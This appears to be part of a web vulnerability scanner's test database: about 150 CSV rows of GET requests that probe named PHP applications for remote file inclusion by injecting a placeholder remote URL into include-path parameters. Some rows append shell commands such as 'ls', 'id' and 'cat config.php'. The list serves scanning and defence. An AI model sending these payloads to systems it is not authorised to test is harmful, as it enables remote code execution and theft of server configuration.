"005705","5292","c","/register.php?base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005706","5292","c","/releasenote.php?mosConfig_absolute_path=@RFIURL ","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005707","5292","c","/rempass.php?lang=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005708","5292","c","/report.php?scriptpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005709","5292","c","/reports/who_r.php?bj=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005710","5292","c","/resources/includes/class.Smarty.php?cfg[sys][base_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005711","5292","c","/ressourcen/dbopen.php?home=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005712","5292","c","/robotstats.inc.php?DOCUMENT_ROOT=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005713","5292","c","/root/public/code/cp_html2txt.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005714","5292","c","/routines/fieldValidation.php?jssShopFileSystem=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005715","5292","c","/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005716","5292","c","/rspa/framework/Controller_v4.php?__ClassPath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005717","5292","c","/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005718","5292","c","/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005719","5292","c","/rss.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005720","5292","c","/rss.php?phpraid_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005721","5292","c","/rss.php?premodDir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005722","5292","c","/rss2.php?page[path]=@RFIURL?&cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005723","5292","c","/run.php?dir=SHELL?&file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005724","5292","c","/s01.php?shopid=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005725","5292","c","/s01.php?shopid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005726","5292","c","/s02.php?shopid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005727","5292","c","/s03.php?shopid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005728","5292","c","/s04.php?shopid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005729","5292","c","/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005730","5292","c","/sablonlar/gunaysoft/gunaysoft.php?sayfaid=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005731","5292","c","/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005732","5292","c","/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005733","5292","c","/sample/xls2mysql/parser_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005734","5292","c","/save.php?file_save=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005735","5292","c","/saveserver.php?thisdir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005736","5292","c","/script//ident/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005737","5292","c","/script/_conf/core/common-tpl-vars.php?confdir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005738","5292","c","/script/common.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005739","5292","c","/script/gestion/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005740","5292","c","/script/ident/disconnect.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005741","5292","c","/script/ident/ident.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005742","5292","c","/script/ident/identification.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005743","5292","c","/script/ident/loginliste.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005744","5292","c","/script/ident/loginmodif.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005745","5292","c","/script/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005746","5292","c","/script/init/createallimagecache.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005747","5292","c","/script/menu/menuadministration.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005748","5292","c","/script/menu/menuprincipal.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005749","5292","c","/script/param/param.inc.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005750","5292","c","/script/plugins/phpgacl/admin/index.php?path_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005751","5292","c","/script/template/index.php?main_page_directory=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005752","5292","c","/script/tick/allincludefortick.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005753","5292","c","/script/tick/test.php?PATH_TO_CODE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005754","5292","c","/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005755","5292","c","/script_path/cms/classes/openengine/filepool.php?oe_classpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005756","5292","c","/script_path/installation/index.php?mosConfig_absolute_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005757","5292","c","/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005758","5292","c","/scripts/check-lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005759","5292","c","/scripts/gallery.scr.php?GLOBALS[PTH][func]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005760","5292","c","/scripts/lom_update.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005761","5292","c","/scripts/news.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005762","5292","c","/scripts/polls.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005763","5292","c","/scripts/rss.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005764","5292","c","/scripts/search.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005765","5292","c","/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005766","5292","c","/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005767","5292","c","/scripts/weigh_keywords.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005768","5292","c","/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005769","5292","c","/search.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005770","5292","c","/search.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005771","5292","c","/search.php?insPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005772","5292","c","/search/submit.php?config[\"sipssys\"]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005773","5292","c","/search_wA.php?LIBPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005774","5292","c","/searchbot.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005775","5292","c","/security/include/_class.security.php?PHPSECURITYADMIN_PATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005776","5292","c","/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005777","5292","c","/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005778","5292","c","/senetman/html/index.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005779","5292","c","/services.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005780","5292","c","/services/samples/inclusionService.php?CabronServiceFolder=@RFIURL%00","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005781","5292","c","/settings.php?P[includes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005782","5292","c","/settings_sql.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005783","5292","c","/setup/inc/database.php?tcms_administer_site=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005784","5292","c","/setup/upgrader.php?RootDirectory=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005785","5292","c","/sezhoo/SezHooTabsAndActions.php?IP=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005786","5292","c","/shop/includes/header.inc.php?dateiPfad=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005787","5292","c","/shop/index.php?action=@RFIURL?&cmd=cat%20config.php","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005788","5292","c","/shop/page.php?osCsid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005789","5292","c","/shop/page.php?pageid=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005790","5292","c","/shoutbox.php?language=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005791","5292","c","/shoutbox.php?root=@RFIURL?cmd=id","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005792","5292","c","/show.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005793","5292","c","/show.php?id=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005794","5292","c","/show.php?page=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005795","5292","c","/show.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005796","5292","c","/show_archives.php?cutepath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005797","5292","c","/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005798","5292","c","/sid=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005799","5292","c","/signer/final.php?smiley=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005800","5292","c","/signin.php?sent=1&AMG_serverpath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005801","5292","c","/sinagb.php?fuss=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005802","5292","c","/sinapis.php?fuss=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005803","5292","c","/sitebar/Integrator.php?file=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005804","5292","c","/sitebar/index.php?writerFile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005805","5292","c","/sitebuilder/admin/top.php?admindir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005806","5292","c","/sitemap.xml.php?dir[classes]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005807","5292","c","/skin/board/default/doctype.php?dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005808","5292","c","/skin/dark/template.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005809","5292","c","/skin/gold/template.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005810","5292","c","/skin/html/table.php?pachtofile=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005811","5292","c","/skin/original/template.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005812","5292","c","/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005813","5292","c","/skins/advanced/advanced1.php?pluginpath[0]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005814","5292","c","/skins/default.php?dir_inc=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005815","5292","c","/skins/header.php?ote_home=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005816","5292","c","/skins/phpchess/layout_admin_cfg.php?Root_Path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005817","5292","c","/skins/phpchess/layout_cfg.php?Root_Path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005818","5292","c","/skins/phpchess/layout_t_top.php?Root_Path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005819","5292","c","/skysilver/login.tpl.php?theme=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005820","5292","c","/slogin_lib.inc.php?slogin_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005821","5292","c","/slogin_lib.inc.php?slogin_path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005822","5292","c","/smarty.php?xcart_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005823","5292","c","/smarty.php?xcart_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005824","5292","c","/smarty/smarty_class.php?_smarty_compile_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005825","5292","c","/smilies.php?config=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005826","5292","c","/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005827","5292","c","/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005828","5292","c","/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005829","5292","c","/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005830","5292","c","/snort/base_stat_common.php?BASE_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005831","5292","c","/social_game_play.php?path=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005832","5292","c","/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005833","5292","c","/song.php?phpbb_root_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005834","5292","c","/source.php?bibtexrootrel=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005835","5292","c","/source/mod/rss/channeledit.php?Codebase=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005836","5292","c","/source/mod/rss/post.php?Codebase=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005837","5292","c","/source/mod/rss/view.php?Codebase=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005838","5292","c","/source/mod/rss/viewitem.php?Codebase=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005839","5292","c","/sources/Admin/admin_cats.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005840","5292","c","/sources/Admin/admin_edit.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005841","5292","c","/sources/Admin/admin_import.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005842","5292","c","/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005843","5292","c","/sources/functions.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005844","5292","c","/sources/help.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005845","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005846","5292","c","/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005847","5292","c","/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005848","5292","c","/sources/mail.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005849","5292","c","/sources/misc/new_day.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005850","5292","c","/sources/news.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005851","5292","c","/sources/post.php?fil_config=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005852","5292","c","/sources/template.php?CONFIG[main_path]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005853","5292","c","/sources/tourney/index.php?page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"005854","5292","c","/spaw/spaw_control.class.php?GLOBALS[spaw_root]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
